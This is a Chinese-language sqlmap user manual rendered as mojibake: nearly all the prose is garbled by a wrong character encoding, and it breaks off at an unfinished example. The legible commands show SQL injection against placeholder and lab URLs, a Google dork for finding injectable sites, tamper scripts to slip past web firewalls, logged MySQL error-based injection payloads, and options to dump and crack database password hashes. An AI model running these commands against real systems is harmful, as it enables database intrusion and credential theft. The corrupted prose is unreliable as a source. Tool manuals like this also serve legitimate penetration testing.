SQLMap鐢ㄦ埛鎵嬪唽銆愯秴璇︾粏銆�

http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

褰撶粰sqlmap杩欎箞涓�涓猽rl鐨勬椂鍊欙紝瀹冧細锛�

1銆佸垽鏂彲娉ㄥ叆鐨勫弬鏁�

2銆佸垽鏂彲浠ョ敤閭ｇSQL娉ㄥ叆鎶�鏈潵娉ㄥ叆

3銆佽瘑鍒嚭鍝鏁版嵁搴�

4銆佹牴鎹敤鎴烽�夋嫨锛岃鍙栧摢浜涙暟鎹�

sqlmap鏀寔浜旂涓嶅悓鐨勬敞鍏ユā寮忥細

1銆佸熀浜庡竷灏旂殑鐩叉敞锛屽嵆鍙互鏍规嵁杩斿洖椤甸潰鍒ゆ柇鏉′欢鐪熷亣鐨勬敞鍏ャ��

2銆佸熀浜庢椂闂寸殑鐩叉敞锛屽嵆涓嶈兘鏍规嵁椤甸潰杩斿洖鍐呭鍒ゆ柇浠讳綍淇℃伅锛岀敤鏉′欢璇彞鏌ョ湅鏃堕棿寤惰繜璇彞鏄惁鎵ц锛堝嵆椤甸潰杩斿洖鏃堕棿鏄惁澧炲姞锛夋潵鍒ゆ柇銆�

3銆佸熀浜庢姤閿欐敞鍏ワ紝鍗抽〉闈細杩斿洖閿欒淇℃伅锛屾垨鑰呮妸娉ㄥ叆鐨勮鍙ョ殑缁撴灉鐩存帴杩斿洖鍦ㄩ〉闈腑銆�

4銆佽仈鍚堟煡璇㈡敞鍏ワ紝鍙互浣跨敤union鐨勬儏鍐典笅鐨勬敞鍏ャ��

5銆佸爢鏌ヨ娉ㄥ叆锛屽彲浠ュ悓鏃舵墽琛屽鏉¤鍙ョ殑鎵ц鏃剁殑娉ㄥ叆銆�

sqlmap鏀寔鐨勬暟鎹簱鏈夛細

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase鍜孲AP MaxDB

鍙互鎻愪緵涓�涓畝鍗曠殑URL锛孊urp鎴朩ebScarab璇锋眰鏃ュ織鏂囦欢锛屾枃鏈枃妗ｄ腑鐨勫畬鏁磆ttp璇锋眰鎴栬�匞oogle鐨勬悳绱紝鍖归厤鍑虹粨鏋滈〉闈紝涔熷彲浠ヨ嚜宸卞畾涔変竴涓鍒欐潵鍒ゆ柇閭ｄ釜鍦板潃鍘绘祴璇曘��

娴嬭瘯GET鍙傛暟锛孭OST鍙傛暟锛孒TTP Cookie鍙傛暟锛孒TTP User-Agent澶村拰HTTP Referer澶存潵纭鏄惁鏈塖QL娉ㄥ叆锛屽畠涔熷彲浠ユ寚瀹氱敤閫楀彿鍒嗛殧鐨勫垪琛ㄧ殑鍏蜂綋鍙傛暟鏉ユ祴璇曘��

鍙互璁惧畾HTTP(S)璇锋眰鐨勫苟鍙戞暟锛屾潵鎻愰珮鐩叉敞鏃剁殑鏁堢巼銆�

Youtube涓婃湁浜哄仛鐨勪娇鐢╯qlmap鐨勮棰戯細

http://www.youtube.com/user/inquisb/videos

http://www.youtube.com/user/stamparm/videos

浣跨敤sqlmap鐨勫疄渚嬫枃绔狅細

http://unconciousmind.blogspot.com/search/label/sqlmap

鍙互鐐瑰嚮https://github.com/sqlmapproject/sqlmap/tarball/master涓嬭浇鏈�鏂扮増鏈瑂qlmap銆�

涔熷彲浠ヤ娇鐢╣it鏉ヨ幏鍙杝qlmap

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

涔嬪悗鍙互鐩存帴浣跨敤鍛戒护鏉ユ洿鏂�

python sqlmap.py --update

鎴栬��

git pull

鏇存柊sqlmap

濡傛灉浣犳兂瑙傚療sqlmap瀵逛竴涓偣鏄繘琛屼簡鎬庢牱鐨勫皾璇曞垽鏂互鍙婅鍙栨暟鎹殑锛屽彲浠ヤ娇鐢�-v鍙傛暟銆�

鍏辨湁涓冧釜绛夌骇锛岄粯璁や负1锛�

0銆佸彧鏄剧ずpython閿欒浠ュ強涓ラ噸鐨勪俊鎭��

1銆佸悓鏃舵樉绀哄熀鏈俊鎭拰璀﹀憡淇℃伅銆傦紙榛樿锛�

2銆佸悓鏃舵樉绀篸ebug淇℃伅銆�

3銆佸悓鏃舵樉绀烘敞鍏ョ殑payload銆�

4銆佸悓鏃舵樉绀篐TTP璇锋眰銆�

5銆佸悓鏃舵樉绀篐TTP鍝嶅簲澶淬��

6銆佸悓鏃舵樉绀篐TTP鍝嶅簲椤甸潰銆�

濡傛灉浣犳兂鐪嬪埌sqlmap鍙戦�佺殑娴嬭瘯payload鏈�濂界殑绛夌骇灏辨槸3銆�

鑾峰彇鐩爣鏂瑰紡

鐩爣URL

鍙傛暟锛�-u鎴栬��--url

鏍煎紡锛歨ttp(s)://targeturl[:port]/[鈥

渚嬪锛歱ython sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

浠嶣urp鎴栬�匴ebScarab浠ｇ悊涓幏鍙栨棩蹇�

鍙傛暟锛�-l

鍙互鐩存帴鍚urp proxy鎴栬�匴ebScarab proxy涓殑鏃ュ織鐩存帴鍊掑嚭鏉ヤ氦缁檚qlmap鏉ヤ竴涓竴涓娴嬫槸鍚︽湁娉ㄥ叆銆�

浠庢枃鏈腑鑾峰彇澶氫釜鐩爣鎵弿

鍙傛暟锛�-m

鏂囦欢涓繚瀛榰rl鏍煎紡濡備笅锛宻qlmap浼氫竴涓竴涓娴�

www.target1.com/vuln1.php?q=foobar

www.target2.com/vuln2.asp?id=1

www.target3.com/vuln3/id/1*

浠庢枃浠朵腑鍔犺浇HTTP璇锋眰

鍙傛暟锛�-r

sqlmap鍙互浠庝竴涓枃鏈枃浠朵腑鑾峰彇HTTP璇锋眰锛岃繖鏍峰氨鍙互璺宠繃璁剧疆涓�浜涘叾浠栧弬鏁帮紙姣斿cookie锛孭OST鏁版嵁锛岀瓑绛夛級銆�

姣斿鏂囨湰鏂囦欢鍐呭涓嬶細

POST /vuln.php HTTP/1.1

Host: www.target.com

User-Agent: Mozilla/4.0

id=1

褰撹姹傛槸HTTPS鐨勬椂鍊欎綘闇�瑕侀厤鍚堣繖涓�--force-ssl鍙傛暟鏉ヤ娇鐢紝鎴栬�呬綘鍙互鍦℉ost澶村悗闂ㄥ姞涓�:443

澶勭悊Google鐨勬悳绱㈢粨鏋�

鍙傛暟锛�-g

sqlmap鍙互娴嬭瘯娉ㄥ叆Google鐨勬悳绱㈢粨鏋滀腑鐨凣ET鍙傛暟锛堝彧鑾峰彇鍓�100涓粨鏋滐級銆�

渚嬪瓙锛�

python sqlmap.py -g "inurl:\".php?id=1\""

锛堝緢鐗汢鐨勫姛鑳斤紝娴嬭瘯浜嗕竴涓嬶紝绗崄鍑犱釜灏辨壘鍒版柊娴殑涓�涓敞鍏ョ偣锛�

姝ゅ鍙互浣跨敤-c鍙傛暟鍔犺浇sqlmap.conf鏂囦欢閲岄潰鐨勭浉鍏抽厤缃��

璇锋眰

http鏁版嵁

鍙傛暟锛�--data

姝ゅ弬鏁版槸鎶婃暟鎹互POST鏂瑰紡鎻愪氦锛宻qlmap浼氬儚妫�娴婫ET鍙傛暟涓�鏍锋娴婸OST鐨勫弬鏁般��

渚嬪瓙锛�

python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

鍙傛暟鎷嗗垎瀛楃

鍙傛暟锛�--param-del

褰揋ET鎴朠OST鐨勬暟鎹渶瑕佺敤鍏朵粬瀛楃鍒嗗壊娴嬭瘯鍙傛暟鐨勬椂鍊欓渶瑕佺敤鍒版鍙傛暟銆�

渚嬪瓙锛�

python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

HTTP cookie澶�

鍙傛暟锛�--cookie,--load-cookies,--drop-set-cookie

杩欎釜鍙傛暟鍦ㄤ互涓嬩袱涓柟闈㈠緢鏈夌敤锛�

1銆亀eb搴旂敤闇�瑕佺櫥闄嗙殑鏃跺�欍��

2銆佷綘鎯宠鍦ㄨ繖浜涘ご鍙傛暟涓祴璇昐QL娉ㄥ叆鏃躲��

鍙互閫氳繃鎶撳寘鎶奵ookie鑾峰彇鍒帮紝澶嶅埗鍑烘潵锛岀劧鍚庡姞鍒�--cookie鍙傛暟閲屻��

鍦℉TTP璇锋眰涓紝閬囧埌Set-Cookie鐨勮瘽锛宻qlmap浼氳嚜鍔ㄨ幏鍙栧苟涓斿湪浠ュ悗鐨勮姹備腑鍔犲叆锛屽苟涓斾細灏濊瘯SQL娉ㄥ叆銆�

濡傛灉浣犱笉鎯虫帴鍙桽et-Cookie鍙互浣跨敤--drop-set-cookie鍙傛暟鏉ユ嫆鎺ャ��

褰撲綘浣跨敤--cookie鍙傛暟鏃讹紝褰撹繑鍥炰竴涓猄et-Cookie澶寸殑鏃跺�欙紝sqlmap浼氳闂綘鐢ㄥ摢涓猚ookie鏉ョ户缁帴涓嬫潵鐨勮姹傘�傚綋--level鐨勫弬鏁拌瀹氫负2鎴栬��2浠ヤ笂鐨勬椂鍊欙紝sqlmap浼氬皾璇曟敞鍏ookie鍙傛暟銆�

HTTP User-Agent澶�

鍙傛暟锛�--user-agent,--random-agent

榛樿鎯呭喌涓媠qlmap鐨凥TTP璇锋眰澶翠腑User-Agent鍊兼槸锛�

sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

鍙互浣跨敤--user-anget鍙傛暟鏉ヤ慨鏀癸紝鍚屾椂涔熷彲浠ヤ娇鐢�--random-agnet鍙傛暟鏉ラ殢鏈虹殑浠�./txt/user-agents.txt涓幏鍙栥��

褰�--level鍙傛暟璁惧畾涓�3鎴栬��3浠ヤ笂鐨勬椂鍊欙紝浼氬皾璇曞User-Angent杩涜娉ㄥ叆銆�

HTTP Referer澶�

鍙傛暟锛�--referer

sqlmap鍙互鍦ㄨ姹備腑浼�燞TTP涓殑referer锛屽綋--level鍙傛暟璁惧畾涓�3鎴栬��3浠ヤ笂鐨勬椂鍊欎細灏濊瘯瀵箁eferer娉ㄥ叆銆�

棰濆鐨凥TTP澶�

鍙傛暟锛�--headers

鍙互閫氳繃--headers鍙傛暟鏉ュ鍔犻澶栫殑http澶�

HTTP璁よ瘉淇濇姢

鍙傛暟锛�--auth-type,--auth-cred

杩欎簺鍙傛暟鍙互鐢ㄦ潵鐧婚檰HTTP鐨勮璇佷繚鎶ゆ敮鎸佷笁绉嶆柟寮忥細

1銆丅asic

2銆丏igest

3銆丯TLM

渚嬪瓙锛�

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP鍗忚鐨勮瘉涔﹁璇�

鍙傛暟锛�--auth-cert

褰揥eb鏈嶅姟鍣ㄩ渶瑕佸鎴风璇佷功杩涜韬唤楠岃瘉鏃讹紝闇�瑕佹彁渚涗袱涓枃浠�:key_file锛宑ert_file銆�

key_file鏄牸寮忎负PEM鏂囦欢锛屽寘鍚潃浣犵殑绉侀挜锛宑ert_file鏄牸寮忎负PEM鐨勮繛鎺ユ枃浠躲��

HTTP(S)浠ｇ悊

鍙傛暟锛�--proxy,--proxy-cred鍜�--ignore-proxy

浣跨敤--proxy浠ｇ悊鏄牸寮忎负锛歨ttp://url:port銆�

褰揌TTP(S)浠ｇ悊闇�瑕佽璇佹槸鍙互浣跨敤--proxy-cred鍙傛暟锛歶sername:password銆�

--ignore-proxy鎷掔粷浣跨敤鏈湴灞�鍩熺綉鐨凥TTP(S)浠ｇ悊銆�

HTTP璇锋眰寤惰繜

鍙傛暟锛�--delay

鍙互璁惧畾涓や釜HTTP(S)璇锋眰闂寸殑寤惰繜锛岃瀹氫负0.5鐨勬椂鍊欐槸鍗婄锛岄粯璁ゆ槸娌℃湁寤惰繜鐨勩��

璁惧畾瓒呮椂鏃堕棿

鍙傛暟锛�--timeout

鍙互璁惧畾涓�涓狧TTP(S)璇锋眰瓒呰繃澶氫箙鍒ゅ畾涓鸿秴鏃讹紝10.5琛ㄧず10.5绉掞紝榛樿鏄�30绉掋��

璁惧畾閲嶈瘯瓒呮椂

鍙傛暟锛�--retries

褰揌TTP(S)瓒呮椂鏃讹紝鍙互璁惧畾閲嶆柊灏濊瘯杩炴帴娆℃暟锛岄粯璁ゆ槸3娆°��

璁惧畾闅忔満鏀瑰彉鐨勫弬鏁板��

鍙傛暟锛�--randomize

鍙互璁惧畾鏌愪竴涓弬鏁板�煎湪姣忎竴娆¤姹備腑闅忔満鐨勫彉鍖栵紝闀垮害鍜岀被鍨嬩細涓庢彁渚涚殑鍒濆鍊间竴鏍枫��

鍒╃敤姝ｅ垯杩囨护鐩爣缃戝潃

鍙傛暟锛�--scope

渚嬪锛�

python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

閬垮厤杩囧鐨勯敊璇姹傝灞忚斀

鍙傛暟锛�--safe-url,--safe-freq

鏈夌殑web搴旂敤绋嬪簭浼氬湪浣犲娆¤闂敊璇殑璇锋眰鏃跺睆钄芥帀浣犱互鍚庣殑鎵�鏈夎姹傦紝杩欐牱鍦╯qlmap杩涜鎺㈡祴鎴栬�呮敞鍏ョ殑鏃跺�欏彲鑳介�犳垚閿欒璇锋眰鑰岃Е鍙戣繖涓瓥鐣ワ紝瀵艰嚧浠ュ悗鏃犳硶杩涜銆�

缁曡繃杩欎釜绛栫暐鏈変袱绉嶆柟寮忥細

1銆�--safe-url锛氭彁渚涗竴涓畨鍏ㄤ笉閿欒鐨勮繛鎺ワ紝姣忛殧涓�娈垫椂闂撮兘浼氬幓璁块棶涓�涓嬨��

2銆�--safe-freq锛氭彁渚涗竴涓畨鍏ㄤ笉閿欒鐨勮繛鎺ワ紝姣忔娴嬭瘯璇锋眰涔嬪悗閮戒細鍐嶈闂竴杈瑰畨鍏ㄨ繛鎺ャ��

鍏虫帀URL鍙傛暟鍊肩紪鐮�

鍙傛暟锛�--skip-urlencode

鏍规嵁鍙傛暟浣嶇疆锛屼粬鐨勫�奸粯璁ゅ皢浼氳URL缂栫爜锛屼絾鏄湁浜涙椂鍊欏悗绔殑web鏈嶅姟鍣ㄤ笉閬靛畧RFC鏍囧噯锛屽彧鎺ュ彈涓嶇粡杩嘦RL缂栫爜鐨勫�硷紝杩欐椂鍊欏氨闇�瑕佺敤--skip-urlencode鍙傛暟銆�

姣忔璇锋眰鏃跺�欐墽琛岃嚜瀹氫箟鐨刾ython浠ｇ爜

鍙傛暟锛�--eval

鍦ㄦ湁浜涙椂鍊欙紝闇�瑕佹牴鎹煇涓弬鏁扮殑鍙樺寲锛岃�屼慨鏀瑰彟涓竴鍙傛暟锛屾墠鑳藉舰鎴愭甯哥殑璇锋眰锛岃繖鏃跺彲浠ョ敤--eval鍙傛暟鍦ㄦ瘡娆¤姹傛椂鏍规嵁鎵�鍐檖ython浠ｇ爜鍋氬畬淇敼鍚庤姹傘��

渚嬪瓙锛�

python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

涓婇潰鐨勮姹傚氨鏄瘡娆¤姹傛椂鏍规嵁id鍙傛暟鍊硷紝鍋氫竴娆d5鍚庝綔涓篽ash鍙傛暟鐨勫�笺��

娉ㄥ叆

娴嬭瘯鍙傛暟

鍙傛暟锛�-p,--skip

sqlmap榛樿娴嬭瘯鎵�鏈夌殑GET鍜孭OST鍙傛暟锛屽綋--level鐨勫�煎ぇ浜庣瓑浜�2鐨勬椂鍊欎篃浼氭祴璇旽TTP Cookie澶寸殑鍊硷紝褰撳ぇ浜庣瓑浜�3鐨勬椂鍊欎篃浼氭祴璇昒ser-Agent鍜孒TTP Referer澶寸殑鍊笺�備絾鏄綘鍙互鎵嬪姩鐢�-p鍙傛暟璁剧疆鎯宠娴嬭瘯鐨勫弬鏁般�備緥濡傦細 -p "id,user-anget"

褰撲綘浣跨敤--level鐨勫�煎緢澶т絾鏄湁涓埆鍙傛暟涓嶆兂娴嬭瘯鐨勬椂鍊欏彲浠ヤ娇鐢�--skip鍙傛暟銆�

渚嬪锛�--skip="user-angent.referer"

鍦ㄦ湁浜涙椂鍊檞eb鏈嶅姟鍣ㄤ娇鐢ㄤ簡URL閲嶅啓锛屽鑷存棤娉曠洿鎺ヤ娇鐢╯qlmap娴嬭瘯鍙傛暟锛屽彲浠ュ湪鎯虫祴璇曠殑鍙傛暟鍚庨潰鍔�*

渚嬪锛�

python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

sqlmap灏嗕細娴嬭瘯value1鐨勪綅缃槸鍚﹀彲娉ㄥ叆銆�

鎸囧畾鏁版嵁搴�

鍙傛暟锛�--dbms

榛樿鎯呭喌绯籹qlmap浼氳嚜鍔ㄧ殑鎺㈡祴web搴旂敤鍚庣鐨勬暟鎹簱鏄粈涔堬紝sqlmap鏀寔鐨勬暟鎹簱鏈夛細

MySQL銆丱racle銆丳ostgreSQL銆丮icrosoft SQL Server銆丮icrosoft Access銆丼QLite銆丗irebird銆丼ybase銆丼AP MaxDB銆丏B2

鎸囧畾鏁版嵁搴撴湇鍔″櫒绯荤粺

鍙傛暟锛�--os

榛樿鎯呭喌涓媠qlmap浼氳嚜鍔ㄧ殑鎺㈡祴鏁版嵁搴撴湇鍔″櫒绯荤粺锛屾敮鎸佺殑绯荤粺鏈夛細Linux銆乄indows銆�

鎸囧畾鏃犳晥鐨勫ぇ鏁板瓧

鍙傛暟锛�--invalid-bignum

褰撲綘鎯虫寚瀹氫竴涓姤閿欑殑鏁板�兼椂锛屽彲浠ヤ娇鐢ㄨ繖涓弬鏁帮紝渚嬪榛樿鎯呭喌绯籭d=13锛宻qlmap浼氬彉鎴恑d=-13鏉ユ姤閿欙紝浣犲彲浠ユ寚瀹氭瘮濡俰d=9999999鏉ユ姤閿欍��

鍙畾鏃犳晥鐨勯�昏緫

鍙傛暟锛�--invalid-logical

鍘熷洜鍚屼笂锛屽彲浠ユ寚瀹歩d=13鎶婂師鏉ョ殑id=-13鐨勬姤閿欐敼鎴恑d=13 AND 18=19銆�

娉ㄥ叆payload

鍙傛暟锛�--prefix,--suffix

鍦ㄦ湁浜涚幆澧冧腑锛岄渶瑕佸湪娉ㄥ叆鐨刾ayload鐨勫墠闈㈡垨鑰呭悗闈㈠姞涓�浜涘瓧绗︼紝鏉ヤ繚璇乸ayload鐨勬甯告墽琛屻��

渚嬪锛屼唬鐮佷腑鏄繖鏍疯皟鐢ㄦ暟鎹簱鐨勶細

$query = "SELECT * FROM users WHERE id=(鈥�" . $_GET[鈥檌d鈥橾 . "鈥�) LIMIT 0, 1";

杩欐椂浣犲氨闇�瑕�--prefix鍜�--suffix鍙傛暟浜嗭細

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "鈥�)" --suffix "AND (鈥檃bc鈥�=鈥檃bc"

杩欐牱鎵ц鐨凷QL璇彞鍙樻垚锛�

$query = "SELECT * FROM users WHERE id=(鈥�1鈥�) AND (鈥檃bc鈥�=鈥檃bc鈥�) LIMIT 0, 1";

淇敼娉ㄥ叆鐨勬暟鎹�

鍙傛暟锛�--tamper

sqlmap闄や簡浣跨敤CHAR()鍑芥暟鏉ラ槻姝㈠嚭鐜板崟寮曞彿涔嬪娌℃湁瀵规敞鍏ョ殑鏁版嵁淇敼锛屼綘鍙互浣跨敤--tamper鍙傛暟瀵规暟鎹仛淇敼鏉ョ粫杩嘩AF绛夎澶囥��

涓嬮潰鏄竴涓猼amper鑴氭湰鐨勬牸寮忥細

# Needed imports

from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against

# the payload

__priority__ = PRIORITY.NORMAL

def tamper(payload):

'''

Description of your tamper script

'''

retVal = payload

# your code to tamper the original payload

# return the tampered payload

return retVal

鍙互鏌ョ湅 tamper/ 鐩綍涓嬬殑鏈夊摢浜涘彲鐢ㄧ殑鑴氭湰

渚嬪锛�

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

[hh:mm:03] [DEBUG] cleaning up configuration parameters

[hh:mm:03] [INFO] loading tamper script 'between'

[hh:mm:03] [INFO] loading tamper script 'randomcase'

[hh:mm:03] [INFO] loading tamper script 'space2comment'

[...]

[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092

[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057

[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041

[...]

[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(

58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/

ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/

group/**/bY/**/x)a)

[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING

clause' injectable

[...]

鎺㈡祴

鎺㈡祴绛夌骇

鍙傛暟锛�--level

鍏辨湁浜斾釜绛夌骇锛岄粯璁や负1锛宻qlmap浣跨敤鐨刾ayload鍙互鍦▁ml/payloads.xml涓湅鍒帮紝浣犱篃鍙互鏍规嵁鐩稿簲鐨勬牸寮忔坊鍔犺嚜宸辩殑payload銆�

杩欎釜鍙傛暟涓嶄粎褰卞搷浣跨敤鍝簺payload鍚屾椂涔熶細褰卞搷娴嬭瘯鐨勬敞鍏ョ偣锛孏ET鍜孭OST鐨勬暟鎹兘浼氭祴璇曪紝HTTP Cookie鍦╨evel涓�2鐨勬椂鍊欏氨浼氭祴璇曪紝HTTP User-Agent/Referer澶村湪level涓�3鐨勬椂鍊欏氨浼氭祴璇曘��

鎬讳箣鍦ㄤ綘涓嶇‘瀹氬摢涓猵ayload鎴栬�呭弬鏁颁负娉ㄥ叆鐐圭殑鏃跺�欙紝涓轰簡淇濊瘉鍏ㄩ潰鎬э紝寤鸿浣跨敤楂樼殑level鍊笺��

椋庨櫓绛夌骇

鍙傛暟锛�--risk

鍏辨湁鍥涗釜椋庨櫓绛夌骇锛岄粯璁ゆ槸1浼氭祴璇曞ぇ閮ㄥ垎鐨勬祴璇曡鍙ワ紝2浼氬鍔犲熀浜庝簨浠剁殑娴嬭瘯璇彞锛�3浼氬鍔燨R璇彞鐨凷QL娉ㄥ叆娴嬭瘯銆�

鍦ㄦ湁浜涙椂鍊欙紝渚嬪鍦║PDATE鐨勮鍙ヤ腑锛屾敞鍏ヤ竴涓狾R鐨勬祴璇曡鍙ワ紝鍙兘瀵艰嚧鏇存柊鐨勬暣涓〃锛屽彲鑳介�犳垚寰堝ぇ鐨勯闄┿��

娴嬭瘯鐨勮鍙ュ悓鏍峰彲浠ュ湪xml/payloads.xml涓壘鍒帮紝浣犱篃鍙互鑷娣诲姞payload銆�

椤甸潰姣旇緝

鍙傛暟锛�--string,--not-string,--regexp,--code

榛樿鎯呭喌涓媠qlmap閫氳繃鍒ゆ柇杩斿洖椤甸潰鐨勪笉鍚屾潵鍒ゆ柇鐪熷亣锛屼絾鏈夋椂鍊欒繖浼氫骇鐢熻宸紝鍥犱负鏈夌殑椤甸潰鍦ㄦ瘡娆″埛鏂扮殑鏃跺�欓兘浼氳繑鍥炰笉鍚岀殑浠ｇ爜锛屾瘮濡傞〉闈㈠綋涓寘鍚竴涓姩鎬佺殑骞垮憡鎴栬�呭叾浠栧唴瀹癸紝杩欎細瀵艰嚧sqlmap鐨勮鍒ゃ�傛鏃剁敤鎴峰彲浠ユ彁渚涗竴涓瓧绗︿覆鎴栬�呬竴娈垫鍒欏尮閰嶏紝鍦ㄥ師濮嬮〉闈笌鐪熸潯浠朵笅鐨勯〉闈㈤兘瀛樺湪鐨勫瓧绗︿覆锛岃�岄敊璇〉闈腑涓嶅瓨鍦紙浣跨敤--string鍙傛暟娣诲姞瀛楃涓诧紝--regexp娣诲姞姝ｅ垯锛夛紝鍚屾椂鐢ㄦ埛鍙互鎻愪緵涓�娈靛瓧绗︿覆鍦ㄥ師濮嬮〉闈笌鐪熸潯浠朵笅鐨勯〉闈㈤兘涓嶅瓨鍦ㄧ殑瀛楃涓诧紝鑰岄敊璇〉闈腑瀛樺湪鐨勫瓧绗︿覆锛�--not-string娣诲姞锛夈�傜敤鎴蜂篃鍙互鎻愪緵鐪熶笌鍋囨潯浠惰繑鍥炵殑HTTP鐘舵�佺爜涓嶄竴鏍锋潵娉ㄥ叆锛屼緥濡傦紝鍝嶅簲200鐨勬椂鍊欎负鐪燂紝鍝嶅簲401鐨勬椂鍊欎负鍋囷紝鍙互娣诲姞鍙傛暟--code=200銆�

鍙傛暟锛�--text-only,--titles

鏈変簺鏃跺�欑敤鎴风煡閬撶湡鏉′欢涓嬬殑杩斿洖椤甸潰涓庡亣鏉′欢涓嬭繑鍥為〉闈㈡槸涓嶅悓浣嶇疆鍦ㄥ摢閲屽彲浠ヤ娇鐢�--text-only锛圚TTP鍝嶅簲浣撲腑涓嶅悓锛�--titles锛圚TML鐨則itle鏍囩涓笉鍚岋級銆�

娉ㄥ叆鎶�鏈�

娴嬭瘯鏄惁鏄敞鍏�

鍙傛暟锛�--technique

杩欎釜鍙傛暟鍙互鎸囧畾sqlmap浣跨敤鐨勬帰娴嬫妧鏈紝榛樿鎯呭喌涓嬩細娴嬭瘯鎵�鏈夌殑鏂瑰紡銆�

鏀寔鐨勬帰娴嬫柟寮忓涓嬶細

B: Boolean-based blind SQL injection锛堝竷灏斿瀷娉ㄥ叆锛�

E: Error-based SQL injection锛堟姤閿欏瀷娉ㄥ叆锛�

U: UNION query SQL injection锛堝彲鑱斿悎鏌ヨ娉ㄥ叆锛�

S: Stacked queries SQL injection锛堝彲澶氳鍙ユ煡璇㈡敞鍏ワ級

T: Time-based blind SQL injection锛堝熀浜庢椂闂村欢杩熸敞鍏ワ級

璁惧畾寤惰繜娉ㄥ叆鐨勬椂闂�

鍙傛暟锛�--time-sec

褰撲娇鐢ㄧ户缁椂闂寸殑鐩叉敞鏃讹紝鏃跺埢浣跨敤--time-sec鍙傛暟璁惧畾寤舵椂鏃堕棿锛岄粯璁ゆ槸5绉掋��

璁惧畾UNION鏌ヨ瀛楁鏁�

鍙傛暟锛�--union-cols

榛樿鎯呭喌涓媠qlmap娴嬭瘯UNION鏌ヨ娉ㄥ叆浼氭祴璇�1-10涓瓧娈垫暟锛屽綋--level涓�5鐨勬椂鍊欎粬浼氬鍔犳祴璇曞埌50涓瓧娈垫暟銆傝瀹�--union-cols鐨勫�煎簲璇ユ槸涓�娈垫暣鏁帮紝濡傦細12-16锛屾槸娴嬭瘯12-16涓瓧娈垫暟銆�

璁惧畾UNION鏌ヨ浣跨敤鐨勫瓧绗�

鍙傛暟锛�--union-char

榛樿鎯呭喌涓媠qlmap閽堝UNION鏌ヨ鐨勬敞鍏ヤ細浣跨敤NULL瀛楃锛屼絾鏄湁浜涙儏鍐典笅浼氶�犳垚椤甸潰杩斿洖澶辫触锛岃�屼竴涓殢鏈烘暣鏁版槸鎴愬姛鐨勶紝杩欐槸浣犲彲浠ョ敤--union-char鍙畾UNION鏌ヨ鐨勫瓧绗︺��

浜岄樁SQL娉ㄥ叆

鍙傛暟锛�--second-order

鏈変簺鏃跺�欐敞鍏ョ偣杈撳叆鐨勬暟鎹湅杩斿洖缁撴灉鐨勬椂鍊欏苟涓嶆槸褰撳墠鐨勯〉闈紝鑰屾槸鍙﹀鐨勪竴涓〉闈紝杩欐椂鍊欏氨闇�瑕佷綘鎸囧畾鍒板摢涓〉闈㈣幏鍙栧搷搴斿垽鏂湡鍋囥��--second-order鍚庨棬璺熶竴涓垽鏂〉闈㈢殑URL鍦板潃銆�

鍒楁暟鎹�

鏍囧織

鍙傛暟锛�-b,--banner

澶у鏁扮殑鏁版嵁搴撶郴缁熼兘鏈変竴涓嚱鏁板彲浠ヨ繑鍥炴暟鎹簱鐨勭増鏈彿锛岄�氬父杩欎釜鍑芥暟鏄痸ersion()鎴栬�呭彉閲廆@version杩欎富瑕佸彇鍐充笌鏄粈涔堟暟鎹簱銆�

鐢ㄦ埛

鍙傛暟锛�-current-user

鍦ㄥぇ澶氭暟鎹簱涓彲浠ヨ幏鍙栧埌绠＄悊鏁版嵁鐨勭敤鎴枫��

褰撳墠鏁版嵁搴�

鍙傛暟锛�--current-db

杩旇繕褰撳墠杩炴帴鐨勬暟鎹簱銆�

褰撳墠鐢ㄦ埛鏄惁涓虹鐞嗙敤

鍙傛暟锛�--is-dba

鍒ゆ柇褰撳墠鐨勭敤鎴锋槸鍚︿负绠＄悊锛屾槸鐨勮瘽浼氳繑鍥濼rue銆�

鍒楁暟鎹簱绠＄悊鐢ㄦ埛

鍙傛暟锛�--users

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚墍鏈夌敤鎴风殑琛ㄧ殑鏉冮檺鏃讹紝灏卞彲浠ュ垪鍑烘墍鏈夌鐞嗙敤鎴枫��

鍒楀嚭骞剁牬瑙ｆ暟鎹簱鐢ㄦ埛鐨刪ash

鍙傛暟锛�--passwords

褰撳墠鐢ㄦ埛鏈夋潈闄愯鍙栧寘鍚敤鎴峰瘑鐮佺殑褰殑鏉冮檺鏃讹紝sqlmap浼氱幇鍒椾妇鍑虹敤鎴凤紝鐒跺悗鍒楀嚭hash锛屽苟灏濊瘯鐮磋В銆�

渚嬪瓙锛�

